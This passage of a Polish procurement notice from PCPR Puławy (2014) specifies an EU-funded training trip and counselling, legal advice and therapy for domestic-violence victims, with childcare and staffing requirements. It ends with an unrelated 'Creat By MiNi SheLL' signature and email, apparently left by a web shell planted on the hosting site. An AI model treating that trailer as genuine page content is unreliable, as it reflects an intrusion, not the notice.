powrotu do Puław), i) 1 koordynator wyjazdu, do zadań którego należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu (harmonogram wyjazdu ma zawierać w szczególności rozkład każdego dnia wyjazdu z uwzględnieniem posiłków, szkoleń, zajęć, a także godzin i czasu podróży), nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji, j) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, ekran projekcyjny,
k) dostęp wszystkich uczestników do SPA, sauny, basenu, przy czym każdy z uczestników ma mieć zapewnione co najmniej po 3 godziny zegarowe (tj. 60 minut) różnych zabiegów zajęć według wyboru wykonawcy, l) zapewnić opiekę oraz zorganizować czas (poprzez zabawę, zajęcia plastyczne, konkursy) dla 15 dzieci podczas trwania zajęć uczestników projektu oraz w czasie trwania zabiegów w SPA. Opiekę powinno sprawować jednocześnie nie mniej niż dwóch opiekunów. Osoby sprawujące opiekę nad otoczeniem powinny posiadać wykształcenie wyższe o kierunku pedagogika lub psychologia i posiadać uprawnienia wychowawcy kolonijnego. ł) dostęp do opieki medycznej, tzn. zapewnienie przez wykonawcę dowozu uczestnika do przychodni zdrowia - w przypadku wystąpienia potrzeby udzielenia pomocy lekarskiej lub pielęgniarskiej. 2) Uczestnicy zajęć otrzymają zaświadczenie o uczestnictwie w treningu kompetencji i umiejętności społecznych które mają być oznaczone logotypem PCPR w Puławach, UE, EFS, i POKL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni  nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 60.17.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Poradnictwo grupowe- grupa wsparcia oraz poradnictwo specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II Poradnictwo grupowe- grupa wsparcia oraz poradnictwo specjalistyczne
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupy wsparcia ( 10 spotkań po 3 godz.), poradnictwa prawnego ( 10 osób po 5 godz. tj. 50 godz. łącznie),  indywidualnej terapii psychologicznej (10 osób po 10 godz. tj. 100 godz.), tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz zapewnieniu opieki nad 13 dzieci uczestników programu będących w wieku 4 - 14 lat podczas trwania grupy wsparcia dla uczestników programu. Uczestnicy programu to: 10 osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej oraz 13 dzieci  będących uczestnikami programu w wieku 4 - 14 lat. 1. Miejsce realizacji zamówienia:
Zamawiający zastrzega, że zamówienie ma być wykonane w budynku na terenie miasta Puławy.2. Termin realizacji zamówienia: Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 01.09.2014r. - 30.11.2014r., z zastrzeżeniem, że poszczególne zajęcia mają się odbywać w następujących terminach, okresach:a) grupa wsparcia Spotkania z uczestnikami mają odbywać się w piątki, raz w tygodniu, z wyjątkiem dni świątecznych, w godzinach pomiędzy 16.00 - 20.00 b) poradnictwo prawne Zajęcia odbywać się mają od poniedziałku do soboty z wyjątkiem dni świątecznych w godzinach pomiędzy 10.00 - 18.00.
c) indywidualna terapia psychologiczna Spotkania z uczestnikami mają odbywać się od poniedziałku do piątku, z wyjątkiem dni świątecznych, w godzinach pomiędzy 9.00 - 18.00. 3.Wymagany minimalny zakres tematyczny zajęć to:
Zajęcia mają zawierać co najmniej poniższe zagadnienia tematyczne w zależności od rodzaju zajęć:a) grupa wsparcia: informacje z zakresu interwencji kryzysowej, mediacji rodzinnej, praw i uprawnień osób doświadczających przemocy, informacje na temat mechanizmów przemocy, rozwiązywanie bieżących problemów uczestników, wsparcie emocjonalne, przepracowanie problemów, odblokowanie emocji, b) poradnictwo prawne: udzielanie informacji o prawach i uprawnieniach służące przywróceniu samodzielności życiowej z zakresu prawa rodzinnego i opiekuńczego, prawa karnego, prawa cywilnego, zabezpieczenia społecznego, ochrony praw lokatorów, w oparciu o nowelizację ustawy o przeciwdziałaniu przemocy w rodzinie,c) indywidualna terapia psychologiczna:terapia dostosowana do indywidualnych (zgłaszanych) oczekiwań każdego uczestnika programu; 4. Sposób prowadzenia zajęć oraz czas ich trwania:Grupa wsparcia ma być prowadzona w formie grupowej.  Poradnictwo prawne ma być prowadzone w formie indywidualnych spotkań. Indywidualna terapia psychologiczna ma być prowadzona w formie indywidualnych spotkań. Czas trwania szkolenia: a) grupa wsparcia 
Ma się odbyć łącznie 10 spotkań, każde z nich trwać po 3 godziny dla grupy tj. łącznie 30 godzin, przy czym 1 godzina to 45 minut zajęć. Podczas trwania grupy wsparcia ma być zapewniona opieka nad  osobami z otoczenia. Opiekę powinno sprawować jednocześnie nie mniej niż dwóch opiekunów.
b) poradnictwo prawne Na każdego z uczestników ma przypadać po 5 godzin poradnictwa prawnego, tj. zorganizowanie 2 spotkań trwających po 2 godziny i 1 spotkania trwającego 1 godzinę, przy czym 1 godzina to 45 minut zajęć. Łącznie ma się odbyć 50 godzin poradnictwa prawnego c) indywidualna terapia psychologiczna
Każdy z 10 uczestników ma odbyć 10 godzin indywidualnej terapii psychologicznej, tj. odbyć 5 spotkań trwających po 2 godziny terapii, przy czym 1 godzina to 45 minut terapii. Łącznie ma się odbyć 100 godzin terapii psychologicznej. 5)Wymagane minimalne kwalifikacje kadry prowadzącej zajęcia: a) grupa wsparcia - zajęcia mają być prowadzone przez 1 osobę: z wykształceniem wyższym na kierunku psychologia i z minimum 5-letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z dorosłymi ofiarami przemocy. b) poradnictwo prawne -osoba prowadząca zajęcia powinna posiadać co najmniej wykształcenie wyższe prawnicze. c) terapia psychologiczna ma być prowadzona  przez 1 osobę z wykształceniem wyższym na kierunku psychologia i z minimum 5-letnim doświadczeniem w pracy na stanowisku psychologa oraz przynajmniej dwuletnim doświadczeniem w pracy psychologa z dorosłymi ofiarami przemocy. 6)Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: Wykonawca nie może pobierać od uczestników zajęć, szkoleń żadnych dodatkowych opłat. 1) Wykonawca ma zapewnić dla wszystkich osób oraz wliczyć w koszt wykonania zamówienia także: a) zapewnić opiekę nad 15 dziećmi uczestników projektu, na czas trwania zajęć uczestników projektu. Opiekę powinno sprawować jednocześnie nie mniej niż dwóch opiekunów. Osoby sprawujące opiekę powinny posiadać wykształcenie wyższe o kierunku pedagogika lub psychologia, mieć ukończony kurs wychowawcy kolonijnego. Do obowiązków opiekuna należeć będzie opieka nad dziećmi, zapewnienie im wspólnych gier, zabaw, konkursów, zajęć plastycznych podczas trwania zajęć uczestników programu. b)  serwis kawowy dla wszystkich uczestników podczas trwania zajęć (tj. kawa, herbata, cukier, śmietanka do kawy, woda mineralna, ciastka). Dla dzieci: ciastka, soki owocowe, woda mineralna, cukierki. c) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, ekran projekcyjny. Sala ma znajdować się w pobliżu sali, gdzie będzie sprawowana opieka nad osobami z otoczenia. d) wykonawca zapewnić ma materiały biurowe dla każdego uczestnika tj. po 1 notatniku A 5 i po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników. Wszystkie materiały szkoleniowe i biurowe wydawane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacji Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy). 
Wykonawca ma zapewnić dostęp dzieciom do materiałów niezbędnych do przeprowadzenia zajęć z nimi, np. zajęć plastycznych, wspólnych zabaw.
2)Uczestnicy otrzymają zaświadczenia: zaświadczenie o uczestnictwie w poradnictwie specjalistycznym, które mają być oznaczone logotypem PCPR w Puławach, UE, EFS, i POKL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com